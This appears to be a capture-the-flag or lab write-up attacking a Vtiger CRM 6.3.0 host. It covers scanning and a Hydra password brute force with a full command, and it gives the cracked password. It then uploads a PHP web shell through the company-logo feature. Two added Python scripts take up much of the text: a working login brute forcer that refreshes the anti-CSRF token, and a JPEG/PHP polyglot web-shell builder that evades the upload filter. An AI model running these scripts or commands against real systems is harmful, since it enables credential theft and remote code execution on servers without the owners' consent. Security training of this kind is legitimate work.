Enumeration:
We begin by port scanning the two gateway IP addresses: 192.168.101.10 has several ports open, while 192.168.101.11 exposes only one (2222).
Port 80/tcp on 192.168.101.10 returns a 403 Forbidden, which suggests a WAF or an access-control rule in front of the site rather than a closed port. Visiting the website with the IP in the URL, the HTML source reveals that it is running WordPress 4.8 and that it supports uploading .jpg images.
Next I run WPScan with a random User-Agent to avoid being filtered (wpscan -u http://192.168.101.10 --enumerate p,t,u,tt --random-agent). The WordPress scan is unsuccessful because it is blocked anyway. Going back to the web page, we click an "enter here" link for customers and are redirected to a default login page (labelled Roundcube mail) for Vtiger CRM version 6.3.0 on port 88.
Searchsploit for "Vtiger CRM 6.3.0" reveals that it is vulnerable to authenticated remote code execution. For this exploit to work we need a valid username and password for the CRM site. The Vtiger wiki lists the default credentials as admin:admin, but the password has been changed. Vtiger CRM's admin interface also allows uploading a company logo, so a PHP file could be uploaded in place of an image.
Next we brute force our way into the CRM with Burp Suite Intruder or THC Hydra: capture the login POST request, then replay it with a password list. We send the captured request to Intruder with the rockyou.txt wordlist, and run Hydra in parallel to see which one finds the password first: (hydra 192.168.101.10 -s 88 http-form-post "/index.php?module=Users&action=Login:____vtrftk=sid%3A294cbea64adb60573e16c47da22ba8342dd36661%2C1538961617&username=^USER^&password=^PASS^:Error=1" -l admin -P /usr/share/wordlists/rockyou.txt -t 20 -o /root/Desktop/crmattack.txt). The last field of the Hydra form string, Error=1, is the failure condition: Vtiger appends it to the URL on a bad login. Burp's free (Community) edition throttles Intruder, so it may take longer.
It takes a while, but we finally get the password: blackstar, which we use to log in to the CRM site.
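The Hydra line above hardcodes the anti-CSRF token copied from one captured request. If the token is bound to the PHP session, every attempt should fetch a fresh one. The script below is an added example, not code from the write-up: it re-fetches the login page, extracts the vtrftk field (whatever number of leading underscores the form uses), replays the session cookie, and treats a redirect to a URL containing Error=1 as a failed login, the same failure marker Hydra is given. The login path and field names come from the captured request; the token regex and the assumption that Error=1 arrives in the Location header are mine to verify against your own capture.

```python
"""Rolling-token login brute force for a Vtiger-style login form.

Added example, not the write-up's code. Assumptions: the login form carries
a hidden field whose name ends in "vtrftk", the token may be tied to the
PHP session cookie, and a failed login redirects to a URL containing
"Error=1" (the same failure string the hydra command uses).
"""
import http.client
import re
import urllib.parse

LOGIN_PATH = "/index.php?module=Users&action=Login"  # from the captured request
FAIL_MARKER = "Error=1"                              # hydra's failure condition

# Matches <input ... name="__vtrftk" value="sid:..."> (any leading underscores).
# Assumption: name comes before value in the markup; adjust if your capture differs.
TOKEN_RE = re.compile(r'name="(_*vtrftk)"\s+value="([^"]*)"')


def extract_token(html):
    """Return (field_name, token_value) from the login page, or None."""
    m = TOKEN_RE.search(html)
    return (m.group(1), m.group(2)) if m else None


def build_login_body(token_field, token, username, password):
    """URL-encode the POST body exactly as the browser form submits it."""
    return urllib.parse.urlencode(
        {token_field: token, "username": username, "password": password}
    ).encode()


def login_failed(status, location, body):
    """True when the response carries the Error=1 marker, either in the
    redirect target (normal case) or in the body (if no redirect happens)."""
    if location and FAIL_MARKER in location:
        return True
    return FAIL_MARKER in body


def session_cookie(set_cookie_header):
    """Reduce a Set-Cookie header to the name=value pair to send back."""
    if not set_cookie_header:
        return ""
    return set_cookie_header.split(";", 1)[0]


def try_password(host, port, username, password, timeout=10):
    """One attempt: GET a fresh token and cookie, then POST the credentials.
    Returns True when the credentials were accepted."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    conn.request("GET", LOGIN_PATH)
    page = conn.getresponse()
    cookie = session_cookie(page.getheader("Set-Cookie"))
    tok = extract_token(page.read().decode("utf-8", "replace"))
    if tok is None:
        raise RuntimeError("no vtrftk field on the login page; check TOKEN_RE")
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    if cookie:
        headers["Cookie"] = cookie
    conn.request("POST", LOGIN_PATH, build_login_body(*tok, username, password), headers)
    resp = conn.getresponse()
    body = resp.read().decode("utf-8", "replace")
    conn.close()
    return not login_failed(resp.status, resp.getheader("Location"), body)


def brute_force(host, port, username, wordlist_path):
    """Walk the wordlist; return the first accepted password or None."""
    with open(wordlist_path, encoding="latin-1") as fh:
        for line in fh:
            candidate = line.rstrip("\n")
            if try_password(host, port, username, candidate):
                return candidate
    return None


if __name__ == "__main__":
    # Usage against the lab host from the write-up (network required).
    print(brute_force("192.168.101.10", 88, "admin", "/usr/share/wordlists/rockyou.txt"))
```

The script is single-threaded on purpose: one GET plus one POST per guess keeps the token and cookie consistent, at the cost of speed. Hydra with -t 20 will be faster if the hardcoded token stays valid, which the write-up's result shows it did here.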
We check the user and admin profiles and gather information that might be useful later. The admin seems to be a Star Wars fan, with the name "darthvader".
Looking around, we can get remote code execution through the company details page at Settings > Templates > Company Details by replacing the company logo with a PHP shell. Upload a PHP file renamed to .jpg, intercept the request in Burp, change the extension back to .php and set the file name to "/test/logo/xxx.php", since inspect element shows /test/logo/ to be the directory the logos are served from. Avoid the literal string "php" inside the script: the upload handler reads the file contents during the upload and errors out if they do not look like a legitimate JPEG/image file.
Once the upload succeeds we browse to the shell (http://192.168.101.10:88/test/logo/logo.php?cmd=ls -la) and have a working PHP web shell. Since we can execute code, we find the CRM token in /var/www/ and submit it.
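The two constraints above (the file must sniff as an image, and the body must not contain "php") are what a polyglot upload solves. The following is an added example, not code from the write-up: it prepends a JPEG SOI/JFIF header so a magic-byte or MIME sniffer reports image/jpeg, uses the PHP short echo tag so the string "php" never appears, and builds the multipart body with the filename already switched to .php, which is the edit the write-up makes in Burp. The form field name "logo", the boundary, and the exact shell body (system() on the cmd parameter the write-up's URL uses) are my assumptions; the real request must be copied from your own capture.

```python
"""Build a logo "image" that is really a PHP web shell.

Added example, not the write-up's code. Assumptions: the upload check is a
content sniff (magic bytes / MIME type) plus a rejection of anything
containing "php"; the field name "logo", the boundary and the filename are
placeholders to replace from a Burp capture of the real Company Details form.
"""

# JPEG SOI marker followed by a 16-byte JFIF APP0 segment; finfo/file(1)
# report this prefix as image/jpeg.
JPEG_HEADER = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"

# PHP short echo tag: the literal "php" never appears, and <?= is always
# enabled since PHP 5.4 regardless of short_open_tag. "cmd" matches the
# ?cmd=ls -la call in the write-up.
DEFAULT_PAYLOAD = b"<?= system($_GET['cmd']); ?>"


def build_polyglot(payload=DEFAULT_PAYLOAD):
    """Prepend the JPEG header so the file sniffs as an image; refuse payloads
    that would trip a naive 'php' substring check."""
    if b"php" in payload.lower():
        raise ValueError("payload contains 'php'; use <?= ... ?> instead")
    return JPEG_HEADER + b"\n" + payload + b"\n"


def looks_like_jpeg(data):
    """The check a magic-byte sniffer performs: SOI marker FF D8 FF."""
    return data[:3] == b"\xff\xd8\xff"


def build_multipart(field, filename, content, boundary="----BurpBoundary7MA4YWxk"):
    """multipart/form-data body with the part's filename set to .php, i.e. the
    edit made in Burp after selecting the file as .jpg in the browser.
    Returns (body, Content-Type header value)."""
    b = boundary.encode()
    body = b"".join([
        b"--" + b + b"\r\n",
        b'Content-Disposition: form-data; name="' + field.encode()
        + b'"; filename="' + filename.encode() + b'"\r\n',
        b"Content-Type: image/jpeg\r\n\r\n",
        content + b"\r\n",
        b"--" + b + b"--\r\n",
    ])
    return body, "multipart/form-data; boundary=" + boundary


if __name__ == "__main__":
    shell = build_polyglot()
    # Save as .jpg for the browser upload; the filename is changed in Burp.
    with open("logo.jpg", "wb") as fh:
        fh.write(shell)
    body, ctype = build_multipart("logo", "logo.php", shell)
    print(ctype)
    print(body.decode("latin-1"))
```

PHP ignores the JPEG bytes before the first <?= tag and sends them to the browser as junk output, so the command output still appears after the header garbage. If the server validates with getimagesize() rather than a MIME sniff, a header-only prefix is not enough: prepend a real, tiny JPEG instead and append the payload after its EOI marker.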